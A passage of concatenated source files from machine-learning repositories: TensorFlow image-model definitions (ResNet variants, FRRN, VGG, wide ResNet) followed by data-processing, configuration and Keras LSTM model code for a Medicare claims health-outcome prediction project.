params_loss(offsets2, gt_offsets2) * mask2 pl = tf.reduce_sum(pl) / (tf.reduce_sum(mask2) + 1) pl = tf.check_numerics(pl * FLAGS.offset_weight, 'pl', name='p1') # params-loss tf.losses.add_loss(pl) self.metrics.append(pl) tf.identity(prob, name='prob') tf.identity(offsets, 'offsets') if FLAGS.finetune: assert FLAGS.colorspace == 'RGB' def is_trainable (x): return x.startswith('head') self.init_session, self.variables_to_train = aardvark.setup_finetune(FLAGS.finetune, is_trainable) pass def main (_): model = Model() aardvark.train(model) pass if __name__ == '__main__': try: tf.app.run() except KeyboardInterrupt: pass ``` #### File: aardvark/zoo/fuck_slim.py ```python import tensorflow as tf import tensorflow.contrib.slim as slim from nets import nets_factory, resnet_utils, resnet_v2 def patch_resnet_arg_scope (is_training): def resnet_arg_scope (weight_decay=0.0001): print('\033[91m' + 'Using patched resnet arg scope' + '\033[0m') batch_norm_decay=0.9 batch_norm_epsilon=5e-4 batch_norm_scale=False activation_fn=tf.nn.relu use_batch_norm=True batch_norm_params = { 'decay': batch_norm_decay, 'epsilon': batch_norm_epsilon, 'scale': batch_norm_scale, 'updates_collections': tf.GraphKeys.UPDATE_OPS, # don't know what it does, but seems improves cifar10 a bit #'fused': None, # Use fused batch norm if possible. 'is_training': is_training } with slim.arg_scope( [slim.conv2d, slim.conv2d_transpose], weights_regularizer=slim.l2_regularizer(weight_decay), #Removing following 2 improves cifar10 performance #weights_initializer=slim.variance_scaling_initializer(), activation_fn=activation_fn, normalizer_fn=slim.batch_norm if use_batch_norm else None, normalizer_params=batch_norm_params): with slim.arg_scope([slim.batch_norm], **batch_norm_params): with slim.arg_scope([slim.max_pool2d], padding='SAME'): with slim.arg_scope([slim.dropout], is_training=is_training) as arg_sc: return arg_sc return resnet_arg_scope def patch (is_training): asc = patch_resnet_arg_scope(is_training) keys = [key for key in nets_factory.arg_scopes_map.keys() if 'resnet_' in key or 'densenet' in key] for key in keys: nets_factory.arg_scopes_map[key] = asc def resnet_v2_14_nmist (inputs, num_classes=None, is_training=True, global_pool=True, output_stride=None, reuse=None, include_root_block=False, spatial_squeeze=True, scope='resnet_v2_14_nist', reduction=2): resnet_v2_block = resnet_v2.resnet_v2_block blocks = [ resnet_v2_block('block1', base_depth=64//reduction, num_units=2, stride=2), resnet_v2_block('block2', base_depth=128//reduction, num_units=2, stride=2), resnet_v2_block('block3', base_depth=256//reduction, num_units=2, stride=1), ] return resnet_v2.resnet_v2( inputs, blocks, num_classes, is_training, global_pool, output_stride, include_root_block=include_root_block, spatial_squeeze=spatial_squeeze, reuse=reuse, scope=scope) def resnet_v2_18 (inputs, num_classes=None, is_training=True, global_pool=True, output_stride=None, reuse=None, include_root_block=True, spatial_squeeze=True, scope='resnet_v2_18', reduction=1): resnet_v2_block = resnet_v2.resnet_v2_block blocks = [ resnet_v2_block('block1', base_depth=64//reduction, num_units=2, stride=2), resnet_v2_block('block2', base_depth=128//reduction, num_units=2, stride=2), resnet_v2_block('block3', base_depth=256//reduction, num_units=2, stride=2), resnet_v2_block('block4', base_depth=512//reduction, num_units=2, stride=1), ] return resnet_v2.resnet_v2( inputs, blocks, num_classes, is_training, global_pool, output_stride, include_root_block=include_root_block, spatial_squeeze=spatial_squeeze, reuse=reuse, scope=scope) def resnet_v2_18_cifar (inputs, num_classes=None, is_training=True, global_pool=False, output_stride=None, reuse=None, scope='resnet_v2_18_cifar', spatial_squeeze=True): #assert global_pool return resnet_v2_18(inputs, num_classes, is_training, global_pool=global_pool, output_stride=output_stride, reuse=reuse, include_root_block=False, scope=scope, spatial_squeeze=spatial_squeeze) def resnet_v2_18_slim (inputs, num_classes=None, is_training=True, global_pool=True, output_stride=None, reuse=None, scope='resnet_v2_18_slim', spatial_squeeze=True): return resnet_v2_18(inputs, num_classes, is_training, global_pool=global_pool, output_stride=output_stride, reuse=reuse, include_root_block=True, scope=scope, reduction=2, spatial_squeeze=spatial_squeeze) def resnet_v2_50_slim(inputs, num_classes=None, is_training=True, global_pool=True, output_stride=None, spatial_squeeze=True, reuse=None, scope='resnet_v2_50'): """ResNet-50 model of [1]. See resnet_v2() for arg and return description.""" resnet_v2_block = resnet_v2.resnet_v2_block reduction=2 blocks = [ resnet_v2_block('block1', base_depth=64//reduction, num_units=3, stride=2), resnet_v2_block('block2', base_depth=128//reduction, num_units=4, stride=2), resnet_v2_block('block3', base_depth=256//reduction, num_units=6, stride=2), resnet_v2_block('block4', base_depth=512//reduction, num_units=3, stride=1), ] return resnet_v2.resnet_v2(inputs, blocks, num_classes, is_training=is_training, global_pool=global_pool, output_stride=output_stride, include_root_block=True, spatial_squeeze=spatial_squeeze, reuse=reuse, scope=scope) def extend (): nets_factory.networks_map['resnet_v2_14_nmist'] = resnet_v2_14_nmist nets_factory.networks_map['resnet_v2_18'] = resnet_v2_18 nets_factory.networks_map['resnet_v2_18_cifar'] = resnet_v2_18_cifar nets_factory.networks_map['resnet_v2_18_slim'] = resnet_v2_18_slim nets_factory.networks_map['resnet_v2_50_slim'] = resnet_v2_50_slim nets_factory.arg_scopes_map['resnet_v2_14_nmist'] = resnet_v2.resnet_arg_scope nets_factory.arg_scopes_map['resnet_v2_18'] = resnet_v2.resnet_arg_scope nets_factory.arg_scopes_map['resnet_v2_18_cifar'] = resnet_v2.resnet_arg_scope nets_factory.arg_scopes_map['resnet_v2_18_slim'] = resnet_v2.resnet_arg_scope nets_factory.arg_scopes_map['resnet_v2_50_slim'] = resnet_v2.resnet_arg_scope pass ``` #### File: zoo/sss/custom_model.py ```python from __future__ import division import os,time,cv2 import tensorflow as tf import tensorflow.contrib.slim as slim import numpy as np def conv_block(inputs, n_filters, filter_size=[3, 3], dropout_p=0.0): """ Basic conv block for Encoder-Decoder Apply successivly Convolution, BatchNormalization, ReLU nonlinearity Dropout (if dropout_p > 0) on the inputs """ conv = slim.conv2d(inputs, n_filters, filter_size, activation_fn=None, normalizer_fn=None) out = tf.nn.relu(slim.batch_norm(conv, fused=True)) if dropout_p != 0.0: out = slim.dropout(out, keep_prob=(1.0-dropout_p)) return out def conv_transpose_block(inputs, n_filters, filter_size=[3, 3], dropout_p=0.0): """ Basic conv transpose block for Encoder-Decoder upsampling Apply successivly Transposed Convolution, BatchNormalization, ReLU nonlinearity Dropout (if dropout_p > 0) on the inputs """ conv = slim.conv2d_transpose(inputs, n_filters, kernel_size=[3, 3], stride=[2, 2]) out = tf.nn.relu(slim.batch_norm(conv, fused=True)) if dropout_p != 0.0: out = slim.dropout(out, keep_prob=(1.0-dropout_p)) return out def build_encoder_decoder_skip(inputs, num_classes, dropout_p=0.5, scope=None): """ Builds the Encoder-Decoder-Skip model. Inspired by SegNet with some modifications Includes skip connections Arguments: inputs: the input tensor n_classes: number of classes dropout_p: dropout rate applied after each convolution (0. for not using) Returns: Encoder-Decoder model """ ##################### # Downsampling path # ##################### net = conv_block(inputs, 64) net = conv_block(net, 64) net = slim.pool(net, [2, 2], stride=[2, 2], pooling_type='MAX') skip_1 = net net = conv_block(net, 128) net = conv_block(net, 128) net = slim.pool(net, [2, 2], stride=[2, 2], pooling_type='MAX') skip_2 = net net = conv_block(net, 256) net = conv_block(net, 256) net = conv_block(net, 256) net = slim.pool(net, [2, 2], stride=[2, 2], pooling_type='MAX') skip_3 = net net = conv_block(net, 512) net = conv_block(net, 512) net = conv_block(net, 512) net = slim.pool(net, [2, 2], stride=[2, 2], pooling_type='MAX') skip_4 = net net = conv_block(net, 512) net = conv_block(net, 512) net = conv_block(net, 512) net = slim.pool(net, [2, 2], stride=[2, 2], pooling_type='MAX') ##################### # Upsampling path # ##################### net = conv_transpose_block(net, 512) net = conv_block(net, 512) net = conv_block(net, 512) net = conv_block(net, 512) net = tf.add(net, skip_4) net = conv_transpose_block(net, 512) net = conv_block(net, 512) net = conv_block(net, 512) net = conv_block(net, 256) net = tf.add(net, skip_3) net = conv_transpose_block(net, 256) net = conv_block(net, 256) net = conv_block(net, 256) net = conv_block(net, 128) net = tf.add(net, skip_2) net = conv_transpose_block(net, 128) net = conv_block(net, 128) net = conv_block(net, 64) net = tf.add(net, skip_1) net = conv_transpose_block(net, 64) net = conv_block(net, 64) net = conv_block(net, 64) ##################### # Softmax # ##################### net = slim.conv2d(net, num_classes, [1, 1], scope='logits') return net ``` #### File: zoo/sss/FRRN.py ```python import tensorflow as tf from tensorflow.contrib import slim import resnet_v1 def Upsampling(inputs,scale): return tf.image.resize_nearest_neighbor(inputs, size=[tf.shape(inputs)[1]*scale, tf.shape(inputs)[2]*scale]) def Unpooling(inputs,scale): return tf.image.resize_bilinear(inputs, size=[tf.shape(inputs)[1]*scale, tf.shape(inputs)[2]*scale]) def ResidualUnit(inputs, n_filters=48, filter_size=3): """ A local residual unit Arguments: inputs: The input tensor n_filters: Number of output feature maps for each conv filter_size: Size of convolution kernel Returns: Output of local residual block """ net = slim.conv2d(inputs, n_filters, filter_size, activation_fn=None) net = slim.batch_norm(net, fused=True) net = tf.nn.relu(net) net = slim.conv2d(net, n_filters, filter_size, activation_fn=None) net = slim.batch_norm(net, fused=True) return net def FullResolutionResidualUnit(pool_stream, res_stream, n_filters_3, n_filters_1, pool_scale): """ A full resolution residual unit Arguments: pool_stream: The inputs from the pooling stream res_stream: The inputs from the residual stream n_filters_3: Number of output feature maps for each 3x3 conv n_filters_1: Number of output feature maps for each 1x1 conv pool_scale: scale of the pooling layer i.e window size and stride Returns: Output of full resolution residual block """ G = tf.concat([pool_stream, slim.pool(res_stream, [pool_scale, pool_scale], stride=[pool_scale, pool_scale], pooling_type='MAX')], axis=-1) net = slim.conv2d(G, n_filters_3, kernel_size=3, activation_fn=None) net = slim.batch_norm(net, fused=True) net = tf.nn.relu(net) net = slim.conv2d(net, n_filters_3, kernel_size=3, activation_fn=None) net = slim.batch_norm(net, fused=True) pool_stream_out = tf.nn.relu(net) net = slim.conv2d(pool_stream_out, n_filters_1, kernel_size=1, activation_fn=None) net = Upsampling(net, scale=pool_scale) res_stream_out = tf.add(res_stream, net) return pool_stream_out, res_stream_out def build_frrn(inputs, num_classes, preset_model='FRRN-A'): """ Builds the Full Resolution Residual Network model. Arguments: inputs: The input tensor preset_model: Which model you want to use. Select FRRN-A or FRRN-B num_classes: Number of classes Returns: FRRN model """ if preset_model == 'FRRN-A': ##################### # Initial Stage ##################### net = slim.conv2d(inputs, 48, kernel_size=5, activation_fn=None) net = slim.batch_norm(net, fused=True) net = tf.nn.relu(net) net = ResidualUnit(net, n_filters=48, filter_size=3) net = ResidualUnit(net, n_filters=48, filter_size=3) net = ResidualUnit(net, n_filters=48, filter_size=3) ##################### # Downsampling Path ##################### pool_stream = slim.pool(net, [2, 2], stride=[2, 2], pooling_type='MAX') res_stream = slim.conv2d(net, 32, kernel_size=1, activation_fn=None) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream = slim.pool(pool_stream, [2, 2], stride=[2, 2], pooling_type='MAX') pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream = slim.pool(pool_stream, [2, 2], stride=[2, 2], pooling_type='MAX') pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=8) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=8) pool_stream = slim.pool(pool_stream, [2, 2], stride=[2, 2], pooling_type='MAX') pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=16) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=16) ##################### # Upsampling Path ##################### pool_stream = Unpooling(pool_stream, 2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=8) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=8) pool_stream = Unpooling(pool_stream, 2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream = Unpooling(pool_stream, 2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream = Unpooling(pool_stream, 2) ##################### # Final Stage ##################### net = tf.concat([pool_stream, res_stream], axis=-1) net = ResidualUnit(net, n_filters=48, filter_size=3) net = ResidualUnit(net, n_filters=48, filter_size=3) net = ResidualUnit(net, n_filters=48, filter_size=3) net = slim.conv2d(net, num_classes, [1, 1], activation_fn=None, scope='logits') return net elif preset_model == 'FRRN-B': ##################### # Initial Stage ##################### net = slim.conv2d(inputs, 48, kernel_size=5, activation_fn=None) net = slim.batch_norm(net, fused=True) net = tf.nn.relu(net) net = ResidualUnit(net, n_filters=48, filter_size=3) net = ResidualUnit(net, n_filters=48, filter_size=3) net = ResidualUnit(net, n_filters=48, filter_size=3) ##################### # Downsampling Path ##################### pool_stream = slim.pool(net, [2, 2], stride=[2, 2], pooling_type='MAX') res_stream = slim.conv2d(net, 32, kernel_size=1, activation_fn=None) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream = slim.pool(pool_stream, [2, 2], stride=[2, 2], pooling_type='MAX') pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream = slim.pool(pool_stream, [2, 2], stride=[2, 2], pooling_type='MAX') pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=8) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=8) pool_stream = slim.pool(pool_stream, [2, 2], stride=[2, 2], pooling_type='MAX') pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=16) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=16) pool_stream = slim.pool(pool_stream, [2, 2], stride=[2, 2], pooling_type='MAX') pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=32) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=32) ##################### # Upsampling Path ##################### pool_stream = Unpooling(pool_stream, 2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=17) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=16) pool_stream = Unpooling(pool_stream, 2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=8) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=8) pool_stream = Unpooling(pool_stream, 2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream = Unpooling(pool_stream, 2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream = Unpooling(pool_stream, 2) ##################### # Final Stage ##################### net = tf.concat([pool_stream, res_stream], axis=-1) net = ResidualUnit(net, n_filters=48, filter_size=3) net = ResidualUnit(net, n_filters=48, filter_size=3) net = ResidualUnit(net, n_filters=48, filter_size=3) net = slim.conv2d(net, num_classes, [1, 1], activation_fn=None, scope='logits') return net else: raise ValueError("Unsupported FRRN model '%s'. This function only supports FRRN-A and FRRN-B" % (preset_model)) ``` #### File: aardvark/zoo/vgg.py ```python from tensorflow import nn from tensorflow import variable_scope from tensorflow.contrib.framework.python.ops import arg_scope from tensorflow.contrib.layers import conv2d, max_pool2d, flatten, fully_connected, batch_norm # https://arxiv.org/pdf/1409.1556.pdf # Notes: # - default size 224x224 # - input should be normalized by substracting mean pixel value # - conv stride is always 1, down-sizing achieved by max_pool # - conv padding is SAME # - all intermediate conv2d have relu # Tensorflow defaults # - conv2: SAME, relu # - max_pool, VALID def classification_head (net, num_classes): net = flatten(net) net = fully_connected(net, 4096) net = fully_connected(net, 4096) net = fully_connected(net, num_classes, activation_fn=None) return net F1x1 = 1 Flrn = 2 configs = {'a': [[64, 1], [128, 1], [256, 2], [512, 2], [512, 2]], 'a_lrn': [[64, 1, Flrn], [128, 1], [256, 2], [512, 2], [512, 2]], 'b': [[64, 2], [128, 2], [256, 2], [512, 2], [512, 2]], 'c': [[64, 2], [128, 2], [256, 2, F1x1], [512, 2, F1x1], [512, 2, F1x1]], 'd': [[64, 2], [128, 2], [256, 3], [512, 3], [512, 3]], 'e': [[64, 2], [128, 2], [256, 4], [512, 4], [512, 4]], } def backbone (net, config, conv2d_params): for block in config: if len(block) == 2: depth, times = block flag = 0 else: depth, times, flag = block for _ in range(times): net = conv2d(net, depth, 3, **conv2d_params) pass if flag == F1x1: net = conv2d(net, depth, 1, **conv2d_params) pass elif flag == Flrn: raise Exception('LRN not implemented') net = max_pool2d(net, 2, 2) return net def vgg (net, num_classes=None, flavor='a', scope=None, conv2d_params = {}): if scope is None: scope = 'vgg_' + flavor with variable_scope(scope): net = backbone(net, configs[flavor], conv2d_params) if not num_classes is None: net = classification_head(net, num_classes) pass return net def vgg_bn (net, is_training, num_classes=None, flavor='a', scope=None): return vgg(net, num_classes, flavor, scope, {"normalizer_fn": batch_norm, "normalizer_params": {"is_training": is_training, "decay": 0.9, "epsilon": 5e-4}}) ``` #### File: aardvark/zoo/wrn.py ```python from tensorflow import variable_scope from tensorflow.contrib.framework.python.ops import arg_scope from tensorflow.contrib.layers import conv2d, max_pool2d, avg_pool2d, flatten, fully_connected, batch_norm # https://arxiv.org/pdf/1605.07146.pdf # https://arxiv.org/abs/1603.05027 def original_conv2d (net, depth, filter_size, step = 1): return conv2d(net, depth, filter_size, step, normalizer_fn=batch_norm) def rewired_conv2d (net, depth, filter_size): # https://arxiv.org/abs/1603.05027 # original: conv-BN-ReLU, # changed here to: BN-ReLU-conv net = batch_norm(net) net = tf.nn.relu(net) net = tf.conv2d(net, depth, filter_size, normalizer_fn=None, activation_fn=None) return net myconv2d = rewired_conv2d def block (net, config, n, depth, pool): branch = net if pool: net = max_pool2d(net, 2, 2) for _ in range(n): for fs in config: if pool: step = 2 pool = False else: step = 1 branch = myconv2d(branch, depth, fs, step, normalizer_fn=batch_norm) return net + branch def wrn (net, k, n, num_classes=None): net = block(net, [3], n, 16, False) # 32 net = block(net, [3,3], n, 16*k, False) # 32 net = block(net, [3,3], n, 32*k, True) # 16 net = block(net, [3,3], n, 64*k, True) # 8 if not num_classes is None: net = avg_pool2d(net, 8, 8) net = conv2d(net, num_classes, 1, activation_fn=None) pass return net ```
{ "source": "aaalgo/cls", "score": 3 }
#### File: cls/flowers/import.py ```python import picpac def import_db (Set): db = picpac.Writer('%s.db' % Set, picpac.OVERWRITE) with open('%s.list' % Set, 'r') as f: for l in f: path, label = l.strip().split('\t') with open(path, 'rb') as f2: buf = f2.read() db.append(float(label), buf) pass pass del db pass import_db('train') import_db('val') ```
{ "source": "aaalgo/health_outcome_challenge", "score": 2 }
#### File: aaalgo/health_outcome_challenge/compact_helper.py ```python import sys import os import traceback import pickle import mrjob from mrjob.job import MRJob import cms import olap import config class MergeJob (MRJob): INPUT_PROTOCOL = mrjob.protocol.BytesProtocol INTERNAL_PROTOCOL = mrjob.protocol.BytesProtocol OUTPUT_PROTOCOL = mrjob.protocol.BytesProtocol FILES = config.HADOOP_FILES JOBCONF = {'mapred.reduce.tasks': 0, 'mapred.child.renice': 10} def mapper_init (self): self.loader = cms.CaseLoader() pass def mapper (self, key, value): case = self.loader.load(value.decode('ascii')) yield key, olap.encode(olap.Case(case)) pass if __name__ == '__main__': MergeJob.run() pass ``` #### File: aaalgo/health_outcome_challenge/config.py ```python S3_SERVER = 'barton:9000' REDUCE_TASKS = 500 S3_ACCESS_KEY = 'minioadmin' S3_SECRET_KEY = 'minioadmin' S3_BUCKET = 'local' USE_FAKE_DATA = False CASE_SERVER_PORT = 9100 WEB_SERVER = 'http://barton:16666' #CELERY_BROKER = 'redis://localhost:6379/1' #CELERY_BACKEND = 'redis://localhost:6379/2' HADOOP_FILES = ['setup_mrjob.py'] #'cms.py', 'meta2.pkl', 'config.py', 'mapping2.pkl', 'olap.py', 'cms_spark.py', 'target.py'] SERVED_DATA = ['/data2/CMS/cms_stage2/*'] try: from local_config import * HADOOP_FILES.append('local_config.py') except: pass def s3_key (v): v = str(int(v)) l1 = v[-3:] l2 = v[-6:-3] return '%s/%s/%s' % (l1, l2, v) if __name__ == '__main__': print(s3_key(498266385)) pass ``` #### File: aaalgo/health_outcome_challenge/generate_meta1.py ```python import os import sys import pickle import cms from glob import glob def scan_files (): tasks = [] for year in [2008, 2009, 2010]: tasks.append(('den_saf_lds_5_%d' % year, (year, 'den', None))) for ctype in cms.CLAIM_TYPES: if ctype == 'car' and year == 2010: tasks.append(('%s_clm_saf_lds_5_%da' % (ctype, year), (year, ctype, None))) tasks.append(('%s_clm_saf_lds_5_%db' % (ctype, year), (year, ctype, None))) else: tasks.append(('%s_clm_saf_lds_5_%d' % (ctype, year), (year, ctype, None))) pass pass for year in [2011, 2012, 2013, 2014, 2015]: tasks.append(('den_saf_lds_5_%d' % year, (year, 'den', None))) for ctype in ['car', 'dme']: for sub in ['claimsj', 'linej']: tasks.append(('%s_%s_lds_5_%d' % (ctype, sub, year), (year, ctype, sub))) pass for ctype in ['inp', 'out', 'hha', 'snf', 'hosp']: for sub in ['claimsj', 'instcond', 'instoccr', 'instval', 'revenuej']: tasks.append(('%s_%s_lds_5_%d' % (ctype, sub, year), (year, ctype, sub))) pass pass for year in [2016, 2017]: tasks.append(('den_saf_lds_5_%d' % year, (year, 'den', None))) for ctype in ['car', 'dme']: for sub in ['claimsk', 'linek', 'demo']: tasks.append(('%s_%s_lds_5_%d' % (ctype, sub, year), (year, ctype, sub))) pass for ctype in ['inp', 'out', 'hha', 'snf', 'hosp']: for sub in ['claimsk', 'instcond', 'instoccr', 'instval', 'revenuek', 'demo']: tasks.append(('%s_%s_lds_5_%d' % (ctype, sub, year), (year, ctype, sub))) pass pass # 只能递增,上面已有的不能删掉 #cnt = len(cms.deep_glob('*.csv')) #assert cnt == len(tasks) return tasks if __name__ == '__main__': tasks = scan_files() lookup = {} formats = [] fts_files = {} csv_files = {} for path in glob('data/*.fts'): fts_files[os.path.basename(path)] = 1 pass for path in glob('data/*.csv'): csv_files[os.path.basename(path)] = 1 pass for bname, ind in tasks: fid = len(formats) year = ind[0] # sanity check files if year >= 2013: del csv_files[bname + '.csv'] pass if '2010a' in bname: continue elif '2010b' in bname: del fts_files[bname.replace('2010b', '2010') + '.fts'] else: del fts_files[bname + '.fts'] pass cols = cms.load_columns_bname(bname) key = None for i, col in enumerate(cols): if col.long_name == 'DESY_SORT_KEY': key = i break pass assert not key is None lookup[bname + '.csv'] = fid formats.append((ind + (key, ), cols)) pass meta_name = 'meta.pkl' assert not os.path.exists(meta_name), "meta.pkl exists" with open(meta_name, 'wb') as f: pickle.dump((cms.META_VERSION, formats, lookup), f) pass print("UNUSED CSV:") for key, _ in csv_files.items(): print(key) print("UNUSED FTS:") for key, _ in fts_files.items(): print(key) pass ``` #### File: health_outcome_challenge/nets_keras/basic4.py ```python import tensorflow as tf from keras.models import Model as BaseModel from keras.layers import Layer, Input, Flatten, Dense, Conv1D, MaxPooling1D, AveragePooling1D, Activation, GlobalAveragePooling1D, GlobalMaxPooling1D, Lambda, Dropout, Multiply, Add, LeakyReLU, LSTM, Embedding, Concatenate class Model (BaseModel): def __init__ (self, codebook): super().__init__() self.embedding = Embedding(codebook, 32) self.concat1 = Concatenate(axis=2) self.conv_claim = Conv1D(32, 1, strides=1, activation='relu') self.lstm = LSTM(32, return_sequences=False, return_state=True) self.dense1 = Dense(32, activation='relu') self.dense2 = Dense(16, activation='relu') self.concat2 = Concatenate(axis=1) self.dense3 = Dense(32, activation='relu') self.dense4 = Dense(2, activation=tf.nn.softmax) pass def call (self, params): demo, claims, codes, transfer = params embed = self.embedding(codes) # batch x n_code x dim # transfer: batch x n_claims x n_code # embed: batch x n_code x dim code_feature = tf.linalg.matmul(transfer, embed) # code_feature: batch x n_claims x dim net = self.concat1([claims, code_feature]) net = self.conv_claim(net) _, state_h, state_c = self.lstm(net) net1 = self.dense1(state_h) net2 = self.dense2(demo) net = self.concat2([net1, net2]) net = self.dense3(net) net = self.dense4(net) return net pass ``` #### File: health_outcome_challenge/nets_keras/basic.py ```python from model_helper import * class Model (tf.keras.Model): def __init__ (self, codebook): super().__init__() self.codebook = codebook pass def call (self, params): demo, claims, codes, transfer = params with track_layers(self): embed = L(Embedding, self.codebook, 32)(codes) # batch x n_code x dim # transfer: batch x n_claims x n_code # embed: batch x n_code x dim code_feature = tf.linalg.matmul(transfer, embed) # code_feature: batch x n_claims x dim net = tf.concat([claims, code_feature], axis=2) net = L(Conv1D, 32, 1, strides=1, activation='relu')(net) _, state_h, state_c = L(LSTM, 32, return_sequences=False, return_state=True)(net) net1 = L(Dense, 32, activation='relu')(state_h) net2 = L(Dense, 16, activation='relu')(demo) net = tf.concat([net1, net2], axis=1) net = L(Dense, 32, activation='relu') (net) net = L(Dense, 2, activation=tf.nn.softmax)(net) return net ``` #### File: aaalgo/health_outcome_challenge/preprocess.py ```python import os import sys import numpy as np import math sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'build/lib.linux-x86_64-' + sys.version[:3]))) sys.path.append(os.path.join('/home/wdong/shared/cms2', 'build/lib.linux-x86_64-' + sys.version[:3])) from cms_core import grad_feature def preprocess(data): # print(data.shape) try: imax=data.shape[0] jmax=data.shape[1] except: data=data.reshape((1,data.shape[0])) imax=data.shape[0] jmax=data.shape[1] processed_data=np.zeros((imax,jmax*2)) i=0 while (i<imax): j=0 while (j<jmax): if (math.isnan(data[i][j])): processed_data[i][j*2]=-3000 else: processed_data[i][j*2]=data[i][j] if (math.isnan(data[i][j])): processed_data[i][j*2+1]=0 else: processed_data[i][j*2+1]=1 j=j+1 i=i+1 return processed_data def faster_preprocess (data): if len(data.shape) == 1: data=data[np.newaxis, :, np.newaxis] else: data=data[:, :, np.newaxis] pass rows = data.shape[0] isnan = np.isnan(data) flags = np.ones_like(data) flags[isnan] = 0 data[isnan] = -3000 data = np.concatenate([data, flags], axis=2).reshape((rows, -1)) return data def feature(whole_train): try: j=whole_train.shape[1] except: whole_train=whole_train.reshape((1,whole_train.shape[0])) i=whole_train.shape[0]-1 while(i<whole_train.shape[0]): length=8*len(whole_train[0,:].flatten()) x_mean=np.nanmean(whole_train[:,:],axis=0) x_std=np.nanstd(whole_train[:,:],axis=0)+0.01 x_norm = np.nan_to_num((whole_train[i,:] - x_mean) / x_std) 